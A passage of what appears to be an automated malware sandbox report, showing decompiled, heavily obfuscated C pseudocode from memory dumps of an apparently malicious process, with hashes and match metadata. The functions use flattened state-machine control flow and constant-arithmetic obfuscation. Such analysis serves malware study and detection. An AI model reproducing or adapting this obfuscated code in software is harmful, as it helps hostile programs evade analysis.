                                                      					_t283 = 0x33905d8a;
                                                      				}
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /,$!t$$R$'$0]$K.$b=$v+
                                                      • API String ID: 0-2997250437
                                                      • Opcode ID: 8a4d8e04c5f95b4cdddbc1bf3411985853f470943adbca11cc3de9f0b761c2e9
                                                      • Instruction ID: b770be84f8ab8d780115132cb48938af94692ef6a282f138e8c9790206cca724
                                                      • Opcode Fuzzy Hash: 8a4d8e04c5f95b4cdddbc1bf3411985853f470943adbca11cc3de9f0b761c2e9
                                                      • Instruction Fuzzy Hash: D3D144711187418FE768CF65C48991FBBE1FB84708F208A1DF596862A0D7BAC959CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 95%
                                                      			E002412E2() {
                                                      				char _v520;
                                                      				char _v1040;
                                                      				signed int _v1044;
                                                      				signed int _v1048;
                                                      				intOrPtr _v1052;
                                                      				intOrPtr _v1056;
                                                      				signed int _v1060;
                                                      				signed int _v1064;
                                                      				signed int _v1068;
                                                      				signed int _v1072;
                                                      				signed int _v1076;
                                                      				signed int _v1080;
                                                      				signed int _v1084;
                                                      				signed int _v1088;
                                                      				signed int _v1092;
                                                      				signed int _v1096;
                                                      				signed int _v1100;
                                                      				signed int _v1104;
                                                      				signed int _v1108;
                                                      				signed int _v1112;
                                                      				unsigned int _v1116;
                                                      				signed int _v1120;
                                                      				signed int _v1124;
                                                      				signed int _v1128;
                                                      				signed int _v1132;
                                                      				signed int _v1136;
                                                      				signed int _v1140;
                                                      				signed int _v1144;
                                                      				signed int _v1148;
                                                      				short* _t246;
                                                      				intOrPtr _t256;
                                                      				void* _t257;
                                                      				void* _t261;
                                                      				void* _t271;
                                                      				intOrPtr _t293;
                                                      				signed int _t297;
                                                      				signed int _t298;
                                                      				signed int _t299;
                                                      				signed int _t300;
                                                      				signed int _t301;
                                                      				signed int _t302;
                                                      				signed int _t303;
                                                      				signed int* _t306;
                                                      
                                                      				_t306 =  &_v1148;
                                                      				_v1048 = _v1048 & 0x00000000;
                                                      				_v1044 = _v1044 & 0x00000000;
                                                      				_t261 = 0x1f2b77a6;
                                                      				_v1056 = 0x1c0398;
                                                      				_v1052 = 0x1a4c8e;
                                                      				_v1080 = 0xed6b;
                                                      				_v1080 = _v1080 + 0xffffb43c;
                                                      				_v1080 = _v1080 ^ 0x000092bf;
                                                      				_v1104 = 0xc4aa;
                                                      				_v1104 = _v1104 * 0x6d;
                                                      				_t297 = 0x23;
                                                      				_v1104 = _v1104 / _t297;
                                                      				_v1104 = _v1104 ^ 0x00022488;
                                                      				_v1112 = 0xb9;
                                                      				_v1112 = _v1112 + 0xffff6145;
                                                      				_v1112 = _v1112 + 0xc51a;
                                                      				_v1112 = _v1112 ^ 0x0000206d;
                                                      				_v1132 = 0x8b7;
                                                      				_v1132 = _v1132 + 0xffff38b6;
                                                      				_v1132 = _v1132 ^ 0xb2a0a749;
                                                      				_t298 = 0x57;
                                                      				_v1132 = _v1132 / _t298;
                                                      				_v1132 = _v1132 ^ 0x00e3f1cf;
                                                      				_v1084 = 0x5f6a;
                                                      				_v1084 = _v1084 << 0xa;
                                                      				_v1084 = _v1084 ^ 0x017dcd17;
                                                      				_v1108 = 0xc835;
                                                      				_v1108 = _v1108 >> 0xd;
                                                      				_t51 =  &_v1108; // 0xd
                                                      				_t299 = 3;
                                                      				_v1108 =  *_t51 * 7;
                                                      				_v1108 = _v1108 ^ 0x00005049;
                                                      				_v1100 = 0x845e;
                                                      				_v1100 = _v1100 + 0x74c1;
                                                      				_v1100 = _v1100 << 3;
                                                      				_v1100 = _v1100 ^ 0x0007b300;
                                                      				_v1116 = 0xc35d;
                                                      				_v1116 = _v1116 * 0x33;
                                                      				_v1116 = _v1116 >> 9;
                                                      				_v1116 = _v1116 ^ 0x000042ed;
                                                      				_v1120 = 0x8ea6;
                                                      				_v1120 = _v1120 >> 2;
                                                      				_v1120 = _v1120 | 0xab635639;
                                                      				_v1120 = _v1120 ^ 0xab63670d;
                                                      				_v1092 = 0x4c03;
                                                      				_v1092 = _v1092 | 0x601fb915;
                                                      				_v1092 = _v1092 ^ 0x04845a80;
                                                      				_v1092 = _v1092 ^ 0x649be272;
                                                      				_v1076 = 0x4c13;
                                                      				_v1076 = _v1076 * 0x2c;
                                                      				_v1076 = _v1076 ^ 0x000d0b59;
                                                      				_v1068 = 0x8d71;
                                                      				_v1068 = _v1068 / _t299;
                                                      				_v1068 = _v1068 ^ 0x0000326e;
                                                      				_v1064 = 0xd7a3;
                                                      				_v1064 = _v1064 >> 0xd;
                                                      				_v1064 = _v1064 ^ 0x00005df9;
                                                      				_v1060 = 0xed2b;
                                                      				_v1060 = _v1060 ^ 0x64d9e662;
                                                      				_v1060 = _v1060 ^ 0x64d941f5;
                                                      				_v1148 = 0x8835;
                                                      				_v1148 = _v1148 + 0xffffd4eb;
                                                      				_t300 = 0x61;
                                                      				_v1148 = _v1148 * 0x34;
                                                      				_v1148 = _v1148 + 0x9f16;
                                                      				_v1148 = _v1148 ^ 0x0013bc95;
                                                      				_v1140 = 0x3032;
                                                      				_v1140 = _v1140 / _t300;
                                                      				_v1140 = _v1140 | 0x38ef646c;
                                                      				_t125 =  &_v1140; // 0x38ef646c
                                                      				_t301 = 0x36;
                                                      				_v1140 =  *_t125 / _t301;
                                                      				_v1140 = _v1140 ^ 0x010de54d;
                                                      				_v1124 = 0xc110;
                                                      				_v1124 = _v1124 << 7;
                                                      				_t302 = 0x3f;
                                                      				_v1124 = _v1124 / _t302;
                                                      				_v1124 = _v1124 ^ 0x00019318;
                                                      				_v1136 = 0x6a8;
                                                      				_v1136 = _v1136 ^ 0x800f5fd5;
                                                      				_v1136 = _v1136 ^ 0x17dc092f;
                                                      				_t303 = 0x37;
                                                      				_v1136 = _v1136 * 0x45;
                                                      				_v1136 = _v1136 ^ 0xebf4d978;
                                                      				_v1144 = 0x9345;
                                                      				_v1144 = _v1144 | 0xef963ffb;
                                                      				_v1144 = _v1144 / _t303;
                                                      				_v1144 = _v1144 ^ 0x045b7df9;
                                                      				_v1128 = 0xf550;
                                                      				_v1128 = _v1128 + 0xffff8b4b;
                                                      				_v1128 = _v1128 >> 1;
                                                      				_v1128 = _v1128 >> 8;
                                                      				_v1128 = _v1128 ^ 0x00000cb5;
                                                      				_v1072 = 0xd52f;
                                                      				_v1072 = _v1072 ^ 0xc146d284;
                                                      				_v1072 = _v1072 ^ 0xc146011a;
                                                      				_v1088 = 0xae87;
                                                      				_v1088 = _v1088 | 0xff36597f;
                                                      				_v1088 = _v1088 ^ 0xff36d7e8;
                                                      				_v1096 = 0xe081;
                                                      				_v1096 = _v1096 ^ 0xf8f61e03;
                                                      				_v1096 = _v1096 + 0xffff4bc3;
                                                      				_v1096 = _v1096 ^ 0xf8f624ac;
                                                      				do {
                                                      					while(_t261 != 0xe2b4321) {
                                                      						if(_t261 == 0x123adc07) {
                                                      							E0023B75F();
                                                      							_t261 = 0x38f4cd20;
                                                      							continue;
                                                      						}
                                                      						if(_t261 == 0x15946a4d) {
                                                      							_t246 = E002328CE( &_v520, _v1128, _v1072);
                                                      							__eflags = 0;
                                                      							 *_t246 = 0;
                                                      							return E00235AEA(_v1088, _v1096,  &_v520);
                                                      						}
                                                      						if(_t261 == 0x1dde1df8) {
                                                      							_push(_t261);
                                                      							E0024A889(_v1068, _v1064,  &_v1040);
                                                      							E00232BDD(_v1068,  &_v1040, _v1060, _v1148,  &_v1040, _v1140, _v1124);
                                                      							_t212 =  &_v1136; // 0xd
                                                      							_push( &_v1040);
                                                      							_push( &_v520);
                                                      							E00237B63( *_t212, _v1144, __eflags);
                                                      							_t306 =  &(_t306[0xa]);
                                                      							_t261 = 0x15946a4d;
                                                      							continue;
                                                      						}
                                                      						if(_t261 == 0x1f2b77a6) {
                                                      							_t256 =  *0x24ca2c; // 0x698300
                                                      							__eflags =  *((intOrPtr*)(_t256 + 0x224));
                                                      							_t261 =  !=  ? 0xe2b4321 : 0x123adc07;
                                                      							continue;
                                                      						}
                                                      						_t313 = _t261 - 0x38f4cd20;
                                                      						if(_t261 != 0x38f4cd20) {
                                                      							goto L12;
                                                      						}
                                                      						_push(_v1132);
                                                      						_t257 = E0024889D(0x24c9b0, _v1112, _t313);
                                                      						_pop(_t271);
                                                      						_t193 =  &_v1116; // 0xd
                                                      						_t293 =  *0x24ca2c; // 0x698300
                                                      						_t197 = _t293 + 0x230; // 0x7a0043
                                                      						E0023C680(_t197, _v1108, _v1100, _t271,  *_t193,  *0x24ca2c, _t257,  &_v520);
                                                      						_t256 = E00242025(_v1120, _t257, _v1092, _v1076);
                                                      						_t306 =  &(_t306[9]);
                                                      						_t261 = 0x1dde1df8;
                                                      					}
                                                      					E002463C1();
                                                      					_t261 = 0x38f4cd20;
                                                      					L12:
                                                      					__eflags = _t261 - 0x3a4044d2;
                                                      				} while (__eflags != 0);
                                                      				return _t256;
                                                      			}


                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: m $+$IP$j_$k$ld8$n2$B
                                                      • API String ID: 0-4100556268
                                                      • Opcode ID: 729efa26b5ac55629d6efff75f2dcc902c88292101d5334939ac5f9554871653
                                                      • Instruction ID: f8848a3a498781ad9b59e7d261633128442ec20ca07ce664e7f08bb3bf3bca88
                                                      • Opcode Fuzzy Hash: 729efa26b5ac55629d6efff75f2dcc902c88292101d5334939ac5f9554871653
                                                      • Instruction Fuzzy Hash: 21B13F71118381DFD368CF26C58991BBBF1BBC4758F508A1EF1969A2A0C7B48A59CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 98%
                                                      			E0023B75F() {
                                                      				signed int _v4;
                                                      				char _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				void* _t216;
                                                      				intOrPtr* _t217;
                                                      				void* _t218;
                                                      				intOrPtr _t226;
                                                      				intOrPtr* _t227;
                                                      				signed int _t228;
                                                      				signed int _t229;
                                                      				signed int _t230;
                                                      				signed int _t231;
                                                      				signed int _t232;
                                                      				signed int _t233;
                                                      				signed int _t234;
                                                      				signed int _t235;
                                                      				void* _t236;
                                                      				void* _t241;
                                                      				void* _t265;
                                                      				signed int* _t269;
                                                      
                                                      				_t269 =  &_v88;
                                                      				_v64 = 0xcca9;
                                                      				_v64 = _v64 | 0x3d0c477d;
                                                      				_v64 = _v64 + 0x3ec7;
                                                      				_v64 = _v64 ^ 0xbd0d0ec5;
                                                      				_v60 = 0x38c3;
                                                      				_v60 = _v60 << 4;
                                                      				_v60 = _v60 >> 6;
                                                      				_v60 = _v60 ^ 0x00000e32;
                                                      				_v88 = 0xa439;
                                                      				_v88 = _v88 + 0x34d8;
                                                      				_v88 = _v88 << 0xe;
                                                      				_v4 = 0;
                                                      				_v88 = _v88 * 0x46;
                                                      				_t265 = 0x32863a22;
                                                      				_v88 = _v88 ^ 0xd6a9fef0;
                                                      				_v32 = 0x5041;
                                                      				_v32 = _v32 ^ 0x94936571;
                                                      				_v32 = _v32 ^ 0x94934631;
                                                      				_v52 = 0x47aa;
                                                      				_t228 = 0x6b;
                                                      				_v52 = _v52 * 0x59;
                                                      				_v52 = _v52 / _t228;
                                                      				_v52 = _v52 ^ 0x00001934;
                                                      				_v76 = 0x9d13;
                                                      				_v76 = _v76 | 0xffbf7fdf;
                                                      				_t229 = 0x4b;
                                                      				_v76 = _v76 * 0x38;
                                                      				_v76 = _v76 ^ 0xf1ffac33;
                                                      				_v56 = 0x2528;
                                                      				_v56 = _v56 ^ 0xff11bbbe;
                                                      				_v56 = _v56 / _t229;
                                                      				_v56 = _v56 ^ 0x0366a499;
                                                      				_v80 = 0x942e;
                                                      				_t230 = 0x65;
                                                      				_v80 = _v80 / _t230;
                                                      				_v80 = _v80 << 0x10;
                                                      				_v80 = _v80 ^ 0x4cc19e00;
                                                      				_v80 = _v80 ^ 0x4db6b316;
                                                      				_v28 = 0xb3;
                                                      				_t231 = 0x4f;
                                                      				_v28 = _v28 / _t231;
                                                      				_v28 = _v28 ^ 0x00007dc1;
                                                      				_v84 = 0xb6fa;
                                                      				_t232 = 0x7e;
                                                      				_v84 = _v84 * 0x7b;
                                                      				_v84 = _v84 + 0x74c4;
                                                      				_v84 = _v84 + 0xffff1df9;
                                                      				_v84 = _v84 ^ 0x005758b1;
                                                      				_v48 = 0xb943;
                                                      				_v48 = _v48 / _t232;
                                                      				_v48 = _v48 << 0xe;
                                                      				_v48 = _v48 ^ 0x005e2ced;
                                                      				_v24 = 0x593;
                                                      				_t233 = 0x59;
                                                      				_t225 = _v4;
                                                      				_v24 = _v24 * 0x2c;
                                                      				_v24 = _v24 ^ 0x0000804c;
                                                      				_v72 = 0xf7ad;
                                                      				_v72 = _v72 / _t233;
                                                      				_v72 = _v72 << 8;
                                                      				_v72 = _v72 + 0xb94c;
                                                      				_v72 = _v72 ^ 0x0003edcb;
                                                      				_v20 = 0xede5;
                                                      				_t234 = 0x17;
                                                      				_v20 = _v20 / _t234;
                                                      				_v20 = _v20 ^ 0x00002281;
                                                      				_v40 = 0x2895;
                                                      				_v40 = _v40 << 7;
                                                      				_v40 = _v40 << 8;
                                                      				_v40 = _v40 ^ 0x144a8d7d;
                                                      				_v44 = 0x7178;
                                                      				_v44 = _v44 >> 0xa;
                                                      				_t235 = 0xf;
                                                      				_v44 = _v44 / _t235;
                                                      				_v44 = _v44 ^ 0x00005c52;
                                                      				_v68 = 0xc8ae;
                                                      				_v68 = _v68 | 0xfda66fe8;
                                                      				_v68 = _v68 << 0xa;
                                                      				_v68 = _v68 >> 5;
                                                      				_v68 = _v68 ^ 0x04dddb27;
                                                      				_v12 = 0xea07;
                                                      				_v12 = _v12 + 0xffffa6b0;
                                                      				_v12 = _v12 ^ 0x0000adca;
                                                      				_v16 = 0x7743;
                                                      				_v16 = _v16 | 0x2d86c018;
                                                      				_v16 = _v16 ^ 0x2d86a9dd;
                                                      				_v36 = 0x116e;
                                                      				_v36 = _v36 >> 0xc;
                                                      				_v36 = _v36 ^ 0x542dd378;
                                                      				_v36 = _v36 ^ 0x542dcb57;
                                                      				while(1) {
                                                      					L1:
                                                      					_t236 = 0x5c;
                                                      					_t216 = 0x1a27fc18;
                                                      					do {
                                                      						while(_t265 != 0x14fc2c0b) {
                                                      							if(_t265 == _t216) {
                                                      								_t217 = E0023E22B(_v20, _v40, _v8, _t225, _v44);
                                                      								_t269 =  &(_t269[3]);
                                                      								__eflags = _t217;
                                                      								_t265 = 0x35b0a114;
                                                      								_v4 = 0 | __eflags == 0x00000000;
                                                      								goto L1;
                                                      							} else {
                                                      								if(_t265 == 0x2364314f) {
                                                      									_push(_v32);
                                                      									_t218 = E0024889D(0x24c9d0, _v88, __eflags);
                                                      									_pop(_t241);
                                                      									__eflags = E00243EB3(_v52, _t241, _t218, _v76, _v56, 0x24c9d0, _v80, _v28, 0x24c9d0, _v84, 0x24c9d0, _v60, _v64,  &_v8);
                                                      									_t265 =  ==  ? 0x1a27fc18 : 0x34b93fb8;
                                                      									E00242025(_v48, _t218, _v24, _v72);
                                                      									_t269 =  &(_t269[0xf]);
                                                      									_t236 = 0x5c;
                                                      									L16:
                                                      									_t216 = 0x1a27fc18;
                                                      									goto L17;
                                                      								} else {
                                                      									if(_t265 == 0x32863a22) {
                                                      										_t265 = 0x14fc2c0b;
                                                      										continue;
                                                      									} else {
                                                      										if(_t265 != 0x35b0a114) {
                                                      											goto L17;
                                                      										} else {
                                                      											E002365A2(_v8, _v68, _v12, _v16, _v36);
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							L8:
                                                      							return _v4;
                                                      						}
                                                      						_t226 =  *0x24ca2c; // 0x698300
                                                      						_t227 = _t226 + 0x230;
                                                      						while(1) {
                                                      							__eflags =  *_t227 - _t236;
                                                      							if( *_t227 == _t236) {
                                                      								break;
                                                      							}
                                                      							_t227 = _t227 + 2;
                                                      							__eflags = _t227;
                                                      						}
                                                      						_t225 = _t227 + 2;
                                                      						__eflags = _t227 + 2;
                                                      						_t265 = 0x2364314f;
                                                      						goto L16;
                                                      						L17:
                                                      						__eflags = _t265 - 0x34b93fb8;
                                                      					} while (__eflags != 0);
                                                      					goto L8;
                                                      				}
                                                      			}


                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (%$AP$Cw$O1d#$O1d#$R\$xq$,^
                                                      • API String ID: 0-1090126677
                                                      • Opcode ID: fc0b7eac682070b86e863ada7dc9972440f97ea631edd66f9fc98ebeca198662
                                                      • Instruction ID: 65ab8ff57d547d57f0defd82d6deff18c2fc809d54de5397f532130be0a90471
                                                      • Opcode Fuzzy Hash: fc0b7eac682070b86e863ada7dc9972440f97ea631edd66f9fc98ebeca198662
                                                      • Instruction Fuzzy Hash: 7AA133B15093409BD359CF64C98A81BFBE2BBC4B58F10491DF285862A0D7B9C959CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E0023EA4C(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                      				signed int _v4;
                                                      				intOrPtr _v8;
                                                      				char _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				void* __ecx;
                                                      				void* _t188;
                                                      				void* _t219;
                                                      				intOrPtr* _t220;
                                                      				void* _t222;
                                                      				void* _t241;
                                                      				void* _t242;
                                                      				signed int _t243;
                                                      				signed int _t244;
                                                      				signed int _t245;
                                                      				signed int _t246;
                                                      				signed int _t247;
                                                      				signed int _t248;
                                                      				signed int _t249;
                                                      				signed int* _t252;
                                                      
                                                      				_t220 = _a12;
                                                      				_push(_a16);
                                                      				_t241 = __edx;
                                                      				_push(_t220);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				E0023602B(_t188);
                                                      				_v8 = 0x50f8de;
                                                      				_t242 = 0;
                                                      				_v4 = _v4 & 0;
                                                      				_t252 =  &(( &_v80)[6]);
                                                      				_v76 = 0x4711;
                                                      				_v76 = _v76 + 0x6e0d;
                                                      				_t222 = 0x302d2de5;
                                                      				_v76 = _v76 << 0x10;
                                                      				_v76 = _v76 | 0x353296c6;
                                                      				_v76 = _v76 ^ 0xb53e96c7;
                                                      				_v52 = 0x1390;
                                                      				_v52 = _v52 << 4;
                                                      				_v52 = _v52 | 0x6ec3950a;
                                                      				_t243 = 0x1f;
                                                      				_v52 = _v52 * 0x25;
                                                      				_v52 = _v52 ^ 0x024a5273;
                                                      				_v64 = 0xc0d5;
                                                      				_v64 = _v64 >> 3;
                                                      				_v64 = _v64 ^ 0x4ce1daf8;
                                                      				_v64 = _v64 + 0xffff0c87;
                                                      				_v64 = _v64 ^ 0x4ce0d906;
                                                      				_v24 = 0xb115;
                                                      				_v24 = _v24 / _t243;
                                                      				_v24 = _v24 ^ 0x000025ae;
                                                      				_v68 = 0xbf02;
                                                      				_v68 = _v68 >> 1;
                                                      				_v68 = _v68 >> 7;
                                                      				_v68 = _v68 | 0xaaaffe07;
                                                      				_v68 = _v68 ^ 0xaaaf82c8;
                                                      				_v72 = 0x967c;
                                                      				_v72 = _v72 ^ 0xbb45b93e;
                                                      				_t244 = 0x5e;
                                                      				_v72 = _v72 * 0x31;
                                                      				_v72 = _v72 | 0x543854ee;
                                                      				_v72 = _v72 ^ 0xdc3e0629;
                                                      				_v28 = 0xb197;
                                                      				_v28 = _v28 / _t244;
                                                      				_v28 = _v28 ^ 0x00005929;
                                                      				_v80 = 0xf6df;
                                                      				_v80 = _v80 * 0x2c;
                                                      				_v80 = _v80 + 0xffff5b03;
                                                      				_v80 = _v80 ^ 0xcc4f4477;
                                                      				_v80 = _v80 ^ 0xcc66b212;
                                                      				_v60 = 0x7f94;
                                                      				_v60 = _v60 * 0x70;
                                                      				_v60 = _v60 + 0xffff5d6f;
                                                      				_v60 = _v60 + 0xffffe912;
                                                      				_v60 = _v60 ^ 0x0037713c;
                                                      				_v40 = 0x7639;
                                                      				_v40 = _v40 ^ 0xf24db204;
                                                      				_v40 = _v40 * 0xf;
                                                      				_v40 = _v40 ^ 0x328e289a;
                                                      				_v20 = 0xd74f;
                                                      				_v20 = _v20 | 0xd22ad029;
                                                      				_v20 = _v20 ^ 0xd22a9d24;
                                                      				_v16 = 0xecd5;
                                                      				_v16 = _v16 << 7;
                                                      				_v16 = _v16 ^ 0x0076152b;
                                                      				_v44 = 0x5bc3;
                                                      				_v44 = _v44 + 0x5ef7;
                                                      				_v44 = _v44 | 0x81401b0a;
                                                      				_v44 = _v44 >> 0xf;
                                                      				_v44 = _v44 ^ 0x00015921;
                                                      				_v32 = 0x3f29;
                                                      				_t245 = 0x22;
                                                      				_v32 = _v32 / _t245;
                                                      				_v32 = _v32 >> 0xd;
                                                      				_v32 = _v32 ^ 0x00005264;
                                                      				_v48 = 0x731;
                                                      				_v48 = _v48 | 0x306aed8f;
                                                      				_v48 = _v48 + 0xffff48d8;
                                                      				_t246 = 0x76;
                                                      				_v48 = _v48 / _t246;
                                                      				_v48 = _v48 ^ 0x0069195c;
                                                      				_v36 = 0x33bb;
                                                      				_t247 = 0x45;
                                                      				_v36 = _v36 / _t247;
                                                      				_v36 = _v36 + 0xffffe7cb;
                                                      				_v36 = _v36 ^ 0xfffff379;
                                                      				_v56 = 0xdfcb;
                                                      				_t248 = 0x48;
                                                      				_v56 = _v56 / _t248;
                                                      				_t249 = 0x3a;
                                                      				_v56 = _v56 / _t249;
                                                      				_v56 = _v56 * 0x52;
                                                      				_v56 = _v56 ^ 0x00005386;
                                                      				do {
                                                      					while(_t222 != 0x246653ae) {
                                                      						if(_t222 == 0x260f4fd2) {
                                                      							_push(_t222);
                                                      							_push(_t222);
                                                      							_t242 = E00238736(_v12);
                                                      							if(_t242 != 0) {
                                                      								_t222 = 0x246653ae;
                                                      								continue;
                                                      							}
                                                      						} else {
                                                      							if(_t222 == 0x2ff0f75c) {
                                                      								_t219 = E002459A5(_v64, 0, _t241,  &_v12, _v24, _v68, _v72, _v28, _t222, _v76, _v80);
                                                      								_t252 =  &(_t252[0xb]);
                                                      								if(_t219 != 0) {
                                                      									_t222 = 0x260f4fd2;
                                                      									continue;
                                                      								}
                                                      							} else {
                                                      								if(_t222 != 0x302d2de5) {
                                                      									goto L11;
                                                      								} else {
                                                      									_t222 = 0x2ff0f75c;
                                                      									continue;
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L12;
                                                      					}
                                                      					E002459A5(_v16, _t242, _t241,  &_v12, _v44, _v32, _v48, _v36, _t222, _v52, _v56);
                                                      					_t252 =  &(_t252[0xb]);
                                                      					 *_t220 = _v12;
                                                      					_t222 = 0x6a13bb9;
                                                      					L11:
                                                      				} while (_t222 != 0x6a13bb9);
                                                      				L12:
                                                      				return _t242;
                                                      			}


                                                      0x0023eca8
                                                      0x0023ecae
                                                      0x0023ecb6
                                                      0x0023ecbe
                                                      0x0023ecca
                                                      0x0023eccf
                                                      0x0023ecd9
                                                      0x0023ece1
                                                      0x0023ecea
                                                      0x0023ecee
                                                      0x0023ecf6
                                                      0x0023ecf6
                                                      0x0023ed04
                                                      0x0023ed65
                                                      0x0023ed66
                                                      0x0023ed70
                                                      0x0023ed76
                                                      0x0023ed78
                                                      0x00000000
                                                      0x0023ed78
                                                      0x0023ed06
                                                      0x0023ed0c
                                                      0x0023ed46
                                                      0x0023ed4b
                                                      0x0023ed50
                                                      0x0023ed52
                                                      0x00000000
                                                      0x0023ed52
                                                      0x0023ed0e
                                                      0x0023ed14
                                                      0x00000000
                                                      0x0023ed1a
                                                      0x0023ed1a
                                                      0x00000000
                                                      0x0023ed1a
                                                      0x0023ed14
                                                      0x0023ed0c
                                                      0x00000000
                                                      0x0023ed04
                                                      0x0023eda3
                                                      0x0023edaf
                                                      0x0023edb2
                                                      0x0023edb4
                                                      0x0023edb9
                                                      0x0023edb9
                                                      0x0023edc6
                                                      0x0023edce

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: n$)?$9v$<q7$dR$--0$--0$T8T
                                                      • API String ID: 0-1820671589
                                                      • Opcode ID: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
                                                      • Instruction ID: b26461ee6086b019258c9ea88240351247bf71f64ba67c129e3c2fade1d54453
                                                      • Opcode Fuzzy Hash: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
                                                      • Instruction Fuzzy Hash: 2E9152710083419BD768CF61C98981FFBF1FBC5B58F405A1DF2968A2A0C3B68A198F47
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E0024A0AF(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8) {
                                                      				intOrPtr _v4;
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				signed int _v96;
                                                      				signed int _v100;
                                                      				signed int _v104;
                                                      				signed int _v108;
                                                      				void* _t237;
                                                      				void* _t251;
                                                      				void* _t256;
                                                      				short _t257;
                                                      				void* _t258;
                                                      				void* _t262;
                                                      				signed int _t268;
                                                      				signed int _t269;
                                                      				void* _t271;
                                                      				signed int _t309;
                                                      				signed int _t310;
                                                      				signed int _t311;
                                                      				signed int _t312;
                                                      				signed int _t313;
                                                      				signed int _t314;
                                                      				signed int _t315;
                                                      				signed int _t316;
                                                      				signed int _t317;
                                                      				intOrPtr _t319;
                                                      				signed int _t320;
                                                      				signed int _t323;
                                                      				signed int* _t325;
                                                      				void* _t327;
                                                      
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0023602B(_t237);
                                                      				_v8 = _v8 & 0x00000000;
                                                      				_t325 =  &(( &_v108)[4]);
                                                      				_v36 = 0x3ea4;
                                                      				_v36 = _v36 >> 7;
                                                      				_t271 = 0x1d995f52;
                                                      				_v36 = _v36 ^ 0x0000fd94;
                                                      				_v100 = 0xb5d8;
                                                      				_t313 = 0x12;
                                                      				_v100 = _v100 / _t313;
                                                      				_v100 = _v100 + 0xffffd667;
                                                      				_v100 = _v100 << 9;
                                                      				_v100 = _v100 ^ 0xffc12715;
                                                      				_v44 = 0xa7b5;
                                                      				_v44 = _v44 + 0x5ef4;
                                                      				_v44 = _v44 ^ 0x00014b95;
                                                      				_v48 = 0x9389;
                                                      				_v48 = _v48 + 0xb0ba;
                                                      				_v48 = _v48 ^ 0x000118ce;
                                                      				_v88 = 0x5fea;
                                                      				_t314 = 0x1c;
                                                      				_v88 = _v88 * 0x7c;
                                                      				_v88 = _v88 ^ 0x636ec63e;
                                                      				_v88 = _v88 ^ 0x63409d32;
                                                      				_v16 = 0x76ea;
                                                      				_v16 = _v16 << 5;
                                                      				_v16 = _v16 ^ 0x000ec3ec;
                                                      				_v20 = 0x91aa;
                                                      				_v20 = _v20 | 0x0edf39e6;
                                                      				_v20 = _v20 ^ 0x0edfdf8b;
                                                      				_v52 = 0xaa70;
                                                      				_v52 = _v52 + 0x8ed4;
                                                      				_v52 = _v52 ^ 0x00017b8d;
